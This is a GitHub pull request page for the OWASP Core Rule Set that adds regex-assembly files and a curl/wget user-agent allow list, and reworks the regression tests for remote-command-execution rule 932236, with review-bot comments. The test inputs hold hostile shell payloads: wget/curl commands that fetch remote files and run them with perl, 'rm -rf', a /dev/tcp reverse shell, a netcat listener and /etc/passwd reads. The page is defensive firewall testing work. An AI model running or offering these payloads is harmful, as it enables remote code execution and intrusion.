fix: exclude well known user agents from unix commands by theseion · Pull Request #3190 · coreruleset/coreruleset · GitHub
Closed
11 changes: 11 additions & 0 deletions regex-assembly/932238-chain1.ra
@@ -0,0 +1,11 @@
##! Please refer to the documentation at
##! https://coreruleset.org/docs/development/regexp_assemble/.

##!+ i

##!^ \b

##!$ \b

##!> include unix-shell-upto3
##!> include unix-shell-4andup-with-params
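Review bot: the file carries no comment stating what chain 1 of 932238 is meant to match; the only comments are the boilerplate documentation pointer. Judging by the include names, this chain mixes `unix-shell-upto3` (short command words, no parameters) with `unix-shell-4andup-with-params` and wraps the result in word boundaries via `##!^ \b` / `##!$ \b`, while the sibling `932239-chain1.ra` in this same PR uses neither anchor. A one-line header saying which request location this chain covers and why the boundaries are required here (and not in 932239) would let the two files be reviewed side by side without reading the unrendered REQUEST-932 conf diff.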
18 changes: 18 additions & 0 deletions regex-assembly/932239-chain1.ra
@@ -0,0 +1,18 @@
##! Please refer to the documentation at
##! https://coreruleset.org/docs/development/regexp_assemble/.

##!+ i

##!> assemble
##!> assemble
##!> include unix-shell-evasion-prefix-start-of-string
##!<

##!> assemble
##!> include unix-shell-evasion-prefix
##!<
##!<
##!=>

##!> include unix-shell-upto3-with-params
##!> include unix-shell-4andup-with-params
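Review bot: the nested `##!> assemble` structure is undocumented. The outer block wraps two inner blocks that each contain exactly one include (`unix-shell-evasion-prefix-start-of-string` and `unix-shell-evasion-prefix`), followed by `##!=>` and the two command-list includes. Add a comment stating the intent, that the two prefix variants are assembled as an alternation and then concatenated with the command lists, and say whether the single-include inner wrappers are needed or whether two includes inside one block would produce the same expression. Unlike `932238-chain1.ra`, this chain sets only `##!+ i` and no `##!^` / `##!$` anchors; if that is deliberate, record it in the header.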
198 changes: 187 additions & 11 deletions rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf

Large diffs are not rendered by default.

4 changes: 4 additions & 0 deletions rules/benign-user-agents.data
@@ -0,0 +1,4 @@
# User agents that are known to be benign but cause false positives,
# like curl or wget, which are also Unix shell commands
curl/
wget/
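Review bot: the comment explains why the entries exist but not how they are matched. The REQUEST-932 diff is not rendered on this page, so the consuming operator is not visible; if the list is fed to a substring operator, `curl/` and `wget/` match anywhere in the header rather than only at its start, which is broader than "the user agent is curl or wget". Please state the intended matching (prefix vs. substring) in the comment, and add a regression test that a User-Agent flagged by the new rules is not exempted merely because one of these tokens appears later in the header.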
167 changes: 22 additions & 145 deletions tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml
Expand Up @@ -5,102 +5,11 @@ meta:
Unix shell RCE
- with / without prefix
- command words of any length
- usual targets + `Referer` and `User-Agent`
- usual targets + `Referer`
enabled: true
name: 932236.yaml
tests:
- test_title: 932236-1
desc: "Unix RCE in request headers"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Host: localhost
User-Agent: ";chmod +x evil.php"
method: GET
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "932236"
- test_title: 932236-2
desc: "Unix RCE in request headers - uppercase"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Host: localhost
User-Agent: ";CHMOD +X EVIL.PHP"
method: GET
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "932236"
- test_title: 932236-3
desc: System Command Injection (932236) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: system('echo cd /tmp;wget http://turbatu.altervista.org/apache_32.png -O p2.txt;curl -O http://turbatu.altervista.org/apache_32.png; mv apache_32.png p.txt;lyxn -DUMP http://turbatu.altervista.org/apache_32.png >p3.txt;perl p.txt; perl p2.txt;perl p3.txt;rm -rf
method: GET
port: 80
uri: /get
version: HTTP/1.1
output:
log_contains: id "932236"
- test_title: 932236-4
desc: System Command Injection (932236) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: http://ricky.ilmerlodellarocca.com/upload.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg; appa.jpg;perl appa.jpg;rm -rf appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;mv ca.php ca.php;chmod 755 ca.php
method: GET
port: 80
uri: /get
version: HTTP/1.1
output:
log_contains: id "932236"
- test_title: 932236-5
desc: True Positive Fix Test 1 ISO-8859-2, ISO-8859-3, ISO-8859-4, ISO-8859-5, ISO-8859-6, ISO-8859-7, ISO-8859-8, ISO-8859-10, ISO-8859-14, ISO-8859-15 are affected because the chars are encoded as decimal html %26%238222%3B and %26%238221%3B entities
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: Something true positive &#8222;The Title&#8221;. After space or new line more characters
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip, deflate, br
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
Content-Type: application/x-www-form-urlencoded
method: POST
port: 80
uri: /post
version: HTTP/1.1
output:
no_log_contains: id "932236"
- test_title: 932236-6
desc: System Command Injection (932236) from old modsec regressions
stages:
- stage:
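Review bot: the User-Agent regression tests (932236-1 through 932236-5 and 932236-9 here, and 932236-27 further down) are deleted outright, and the meta description drops `User-Agent` from the listed targets, but no replacement test file appears in this changeset: the file list shows new `.ra` files for 932238 and 932239 and a large unrendered change to REQUEST-932-APPLICATION-ATTACK-RCE.conf, but no `932238.yaml` or `932239.yaml`. If User-Agent coverage moved to the new rules, move these tests with it and point their `log_contains` / `no_log_contains` at the new ids instead of dropping them, so both the positive cases and the negative ISO-8859 entity case (`932236-5`) stay under test. Renumbering the surviving tests from `932236-6` down to `932236-1` also touches every remaining test in the file; keeping the original numbers (leaving gaps) would make this diff far smaller and keep test ids stable for anyone referencing them.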
Expand All @@ -121,7 +30,7 @@ tests:
version: HTTP/1.1
output:
log_contains: id "932236"
- test_title: 932236-7
- test_title: 932236-2
desc: System Command Injection (932236) from old modsec regressions
stages:
- stage:
Expand All @@ -142,7 +51,7 @@ tests:
version: HTTP/1.1
output:
log_contains: id "932236"
- test_title: 932236-8
- test_title: 932236-3
desc: True Positive Fix Test 1 ISO-8859-2, ISO-8859-3, ISO-8859-4, ISO-8859-5, ISO-8859-6, ISO-8859-7, ISO-8859-8, ISO-8859-10, ISO-8859-14, ISO-8859-15 are affected because the chars are encoded as decimal html %26%238222%3B and %26%238221%3B entities
stages:
- stage:
Expand All @@ -162,23 +71,7 @@ tests:
version: HTTP/1.1
output:
no_log_contains: id "932236"
- test_title: 932236-9
desc: "False negative report - user agent"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Host: localhost
User-Agent: ;cp /var/log/apache2/error.log evil.php
method: POST
port: 80
uri: /post
version: HTTP/1.0
output:
log_contains: id "932236"
- test_title: 932236-10
- test_title: 932236-4
desc: "False negative report - POST arguments"
stages:
- stage:
Expand All @@ -195,7 +88,7 @@ tests:
data: ;cp /var/log/apache2/error.log evil.php
output:
log_contains: id "932236"
- test_title: 932236-11
- test_title: 932236-5
desc: "Negative test on German numbering - Schauen Sie sich diese Zahl an: 1'000'000"
stages:
- stage:
Expand All @@ -215,7 +108,7 @@ tests:
version: HTTP/1.1
output:
no_log_contains: id "932236"
- test_title: 932236-12
- test_title: 932236-6
desc: "Positive test - BB BBBZARPI - d=/dev&&(sh)0>$d/tcp/51.15.142.164/777"
stages:
- stage:
Expand All @@ -233,7 +126,7 @@ tests:
version: HTTP/1.1
output:
log_contains: id "932236"
- test_title: 932236-13
- test_title: 932236-7
desc: "55O5COJ5"
stages:
- stage:
Expand All @@ -251,7 +144,7 @@ tests:
version: HTTP/1.0
output:
log_contains: id "932236"
- test_title: 932236-14
- test_title: 932236-8
desc: "55O5COJ5"
stages:
- stage:
Expand All @@ -269,7 +162,7 @@ tests:
version: HTTP/1.0
output:
log_contains: id "932236"
- test_title: 932236-15
- test_title: 932236-9
desc: "9323HNQU"
stages:
- stage:
Expand All @@ -287,7 +180,7 @@ tests:
version: HTTP/1.0
output:
log_contains: id "932236"
- test_title: 932236-16
- test_title: 932236-10
desc: "9323HNQU"
stages:
- stage:
Expand All @@ -305,7 +198,7 @@ tests:
version: HTTP/1.0
output:
log_contains: id "932236"
- test_title: 932236-17
- test_title: 932236-11
desc: "9323HNQU"
stages:
- stage:
Expand All @@ -323,7 +216,7 @@ tests:
version: HTTP/1.0
output:
log_contains: id "932236"
- test_title: 932236-18
- test_title: 932236-12
desc: "9323HNQU"
stages:
- stage:
Expand All @@ -341,7 +234,7 @@ tests:
version: HTTP/1.0
output:
log_contains: id "932236"
- test_title: 932236-19
- test_title: 932236-13
desc: "9323HNQU"
stages:
- stage:
Expand All @@ -359,7 +252,7 @@ tests:
version: HTTP/1.0
output:
log_contains: id "932236"
- test_title: 932236-20
- test_title: 932236-14
desc: "9323HNQU"
stages:
- stage:
Expand All @@ -377,7 +270,7 @@ tests:
version: HTTP/1.0
output:
log_contains: id "932236"
- test_title: 932236-21
- test_title: 932236-15
desc: "ATFHUJVF"
stages:
- stage:
Expand All @@ -395,7 +288,7 @@ tests:
version: HTTP/1.0
output:
log_contains: id "932236"
- test_title: 932236-22
- test_title: 932236-16
desc: "JW2SU88A"
stages:
- stage:
Expand All @@ -413,7 +306,7 @@ tests:
code=;cat /path/file.gz
output:
log_contains: id "932236"
- test_title: 932236-23
- test_title: 932236-17
desc: "4JOGUXYQ"
stages:
- stage:
Expand All @@ -431,7 +324,7 @@ tests:
find /etc -name passwd -exec cat {} +
output:
log_contains: id "932236"
- test_title: 932236-24
- test_title: 932236-18
desc: "ANQ9SN3S"
stages:
- stage:
Expand All @@ -449,7 +342,7 @@ tests:
code=flock -u / whoami
output:
log_contains: id "932236"
- test_title: 932236-25
- test_title: 932236-19
desc: "JW2SU88A"
stages:
- stage:
Expand All @@ -467,7 +360,7 @@ tests:
code=cat /path/file.gz
output:
log_contains: id "932236"
- test_title: 932236-26
- test_title: 932236-20
desc: "P6E0KY27"
stages:
- stage:
Expand All @@ -485,23 +378,7 @@ tests:
code=cpulimit -l 100 -f whoami
output:
log_contains: id "932236"
- test_title: 932236-27
desc: "IXMZUXBG"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: a=nc&&$a -nlvp 555
Host: localhost
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
method: GET
port: 80
uri: /get
version: HTTP/1.0
output:
log_contains: id "932236"
- test_title: 932236-28
- test_title: 932236-21
desc: "IXMZUXBG"
stages:
- stage:
Expand All @@ -518,7 +395,7 @@ tests:
version: HTTP/1.0
output:
log_contains: id "932236"
- test_title: 932236-29
- test_title: 932236-22
desc: "FP agains 'fi' without word boundary"
stages:
- stage:
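Review bot: the context line `desc: "FP agains 'fi' without word boundary"` has a typo (`agains` should be `against`); since this test's title line is already being rewritten in this hunk, fix the description in the same commit.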